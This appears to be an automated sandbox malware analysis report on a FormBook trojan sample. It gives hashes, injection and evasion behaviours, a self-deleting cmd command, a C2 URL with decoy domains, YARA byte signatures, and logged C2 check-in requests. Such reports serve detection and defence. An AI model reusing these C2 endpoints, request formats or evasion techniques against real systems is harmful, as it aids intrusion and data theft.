
Windows Analysis Report nji3Lg1ot6

Overview

General Information

Sample Name: nji3Lg1ot6 (renamed file extension from none to exe)
Analysis ID: 552997
MD5: 8eddcc35719034649f6947b2b08bcdf3
SHA1: 5506b69b4584f43232f45299192a540ec0197998
SHA256: 0d072a60b433f330d2ba97d75eae7af07e9d75bc6ed5b1065287661d05e82ab6
Tags: 32, exe, trojan

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • nji3Lg1ot6.exe (PID: 5092 cmdline: "C:\Users\user\Desktop\nji3Lg1ot6.exe" MD5: 8EDDCC35719034649F6947B2B08BCDF3)
    • nji3Lg1ot6.exe (PID: 6920 cmdline: "C:\Users\user\Desktop\nji3Lg1ot6.exe" MD5: 8EDDCC35719034649F6947B2B08BCDF3)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autochk.exe (PID: 6480 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
        • msiexec.exe (PID: 1304 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 7156 cmdline: /c del "C:\Users\user\Desktop\nji3Lg1ot6.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rthearts.com/nk6l/"], "decoy": ["cbnextra.com", "entitysystemsinc.com", "55midwoodave.com", "ebelizzi.com", "khojcity.com", "1527brokenoakdrive.site", "housinghproperties.com", "ratiousa.com", "lrcrepresentacoes.net", "tocoec.net", "khadamatdemnate.com", "davidkastner.xyz", "gardeniaresort.com", "qiantangguoji.com", "visaprepaidprocessinq.com", "cristinamadara.com", "semapisus.xyz", "mpwebagency.net", "alibabasdeli.com", "gigasupplies.com", "quantumskillset.com", "eajui136.xyz", "patsanchezelpaso.com", "trined.mobi", "amaturz.info", "approveprvqsx.xyz", "fronterapost.house", "clairewashere.site", "xn--3jst70hg8f.com", "thursdaynightthriller.com", "primacykapjlt.xyz", "vaginette.site", "olitusd.com", "paypal-caseid521.com", "preose.xyz", "ferbsqlv28.club", "iffiliatefreedom.com", "okdahotel.com", "cochuzyan.xyz", "hotyachts.net", "diamond-beauties.com", "storyofsol.com", "xianshucai.net", "venusmedicalarts.com", "energiaorgonu.com", "savannah.biz", "poeticdaily.com", "wilddalmatian.com", "kdydkyqksqucyuyen.com", "meanmod.xyz", "kaka.digital", "viewcision.com", "wowzerbackupandrestore-us.com", "hydrogendatapower.com", "427521.com", "ponto-bras.space", "chevalsk.com", "hnftdl.com", "nanasyhogar.com", "createacarepack.com", "wildkraeuter-wochenende.com", "uchihomedeco.com", "quintongiang.com", "mnbvending.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18839:$sqlite3step: 68 34 1C 7B E1
    • 0x1894c:$sqlite3step: 68 34 1C 7B E1
    • 0x18868:$sqlite3text: 68 38 2A 90 C5
    • 0x1898d:$sqlite3text: 68 38 2A 90 C5
    • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x16a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x1191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x17a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x191f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x40c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x7917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x891a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
1.0.nji3Lg1ot6.exe.400000.2.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.0.nji3Lg1ot6.exe.400000.2.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.0.nji3Lg1ot6.exe.400000.2.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x18839:$sqlite3step: 68 34 1C 7B E1
        • 0x1894c:$sqlite3step: 68 34 1C 7B E1
        • 0x18868:$sqlite3text: 68 38 2A 90 C5
        • 0x1898d:$sqlite3text: 68 38 2A 90 C5
        • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
1.2.nji3Lg1ot6.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.nji3Lg1ot6.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook (configuration listed in the Malware Configuration section above)
Multi AV Scanner detection for submitted file
Source: nji3Lg1ot6.exe | Virustotal: Detection: 37%
Source: nji3Lg1ot6.exe | ReversingLabs: Detection: 41%
Yara detected FormBook
Source: Yara match | File source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for sample
Source: nji3Lg1ot6.exe | Joe Sandbox ML: detected
Source: 7.2.msiexec.exe.4baf840.4.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 7.2.msiexec.exe.2c5b358.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.nji3Lg1ot6.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.nji3Lg1ot6.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.nji3Lg1ot6.exe.400000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.nji3Lg1ot6.exe.400000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.nji3Lg1ot6.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: nji3Lg1ot6.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: msiexec.pdb source: nji3Lg1ot6.exe, 00000001.00000002.345417642.0000000000EA0000.00000040.00020000.sdmp
Source: Binary string: msiexec.pdbGCTL source: nji3Lg1ot6.exe, 00000001.00000002.345417642.0000000000EA0000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: nji3Lg1ot6.exe, 00000000.00000003.294014026.0000000003090000.00000004.00000001.sdmp, nji3Lg1ot6.exe, 00000000.00000003.290725743.0000000003220000.00000004.00000001.sdmp, nji3Lg1ot6.exe, 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, nji3Lg1ot6.exe, 00000001.00000002.345127293.0000000000B1F000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: nji3Lg1ot6.exe, nji3Lg1ot6.exe, 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, nji3Lg1ot6.exe, 00000001.00000002.345127293.0000000000B1F000.00000040.00000001.sdmp, msiexec.exe, msiexec.exe, 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 0_2_00405D7C FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 0_2_00402630 FindFirstFileA,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 23.227.38.74:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 23.227.38.74:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 23.227.38.74:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.alibabasdeli.com
Source: C:\Windows\explorer.exe | Domain query: www.nanasyhogar.com
Source: C:\Windows\explorer.exe | Network Connect: 172.67.173.57 80
Source: C:\Windows\explorer.exe | Network Connect: 23.227.38.74 80
Source: C:\Windows\explorer.exe | Network Connect: 50.31.177.38 80
Source: C:\Windows\explorer.exe | Domain query: www.gigasupplies.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.rthearts.com/nk6l/
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global traffic | HTTP traffic detected: GET /nk6l/?Mn6p=MMWPsHlVo7vbxfqT+E8iHGCJx4EpOMO7XTm/RW/7WjycdebsiPyF7OJFYt5Z76O5OpDL&m87=kDHx4bf HTTP/1.1 | Host: www.nanasyhogar.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /nk6l/?Mn6p=zX7TWLgUTNDtCnt/XwnHS79HNPNEveCsoMI9+/ObXOF7SG2tu7bFQ30QzdtJgFVEPE8r&m87=kDHx4bf HTTP/1.1 | Host: www.alibabasdeli.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /nk6l/?Mn6p=sMbkpEIYm7OVlcdzrpiwDTFtc4P6BDcndIa3bMJ3nzzEqPK8OVYh2AVyK3PkcpAP2wum&m87=kDHx4bf HTTP/1.1 | Host: www.gigasupplies.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 23.227.38.74 23.227.38.74
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Fri, 14 Jan 2022 02:39:09 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | X-Sorting-Hat-PodId: 188 | X-Sorting-Hat-ShopId: 60258091197 | X-Dc: gcp-europe-west1 | X-Request-ID: 077675b5-2854-474a-9745-e2e99dc925ce | X-Permitted-Cross-Domain-Policies: none | X-XSS-Protection: 1; mode=block | X-Download-Options: noopen | X-Content-Type-Options: nosniff | CF-Cache-Status: DYNAMIC | Server: cloudflare | CF-RAY: 6cd37e035a694e0e-FRA | alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 | Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css">
Source: nji3Lg1ot6.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: nji3Lg1ot6.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: unknown | DNS traffic detected: queries for: www.nanasyhogar.com
Source: global traffic | HTTP traffic detected: GET /nk6l/?Mn6p=MMWPsHlVo7vbxfqT+E8iHGCJx4EpOMO7XTm/RW/7WjycdebsiPyF7OJFYt5Z76O5OpDL&m87=kDHx4bf HTTP/1.1 | Host: www.nanasyhogar.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /nk6l/?Mn6p=zX7TWLgUTNDtCnt/XwnHS79HNPNEveCsoMI9+/ObXOF7SG2tu7bFQ30QzdtJgFVEPE8r&m87=kDHx4bf HTTP/1.1 | Host: www.alibabasdeli.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /nk6l/?Mn6p=sMbkpEIYm7OVlcdzrpiwDTFtc4P6BDcndIa3bMJ3nzzEqPK8OVYh2AVyK3PkcpAP2wum&m87=kDHx4bf HTTP/1.1 | Host: www.gigasupplies.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 0_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
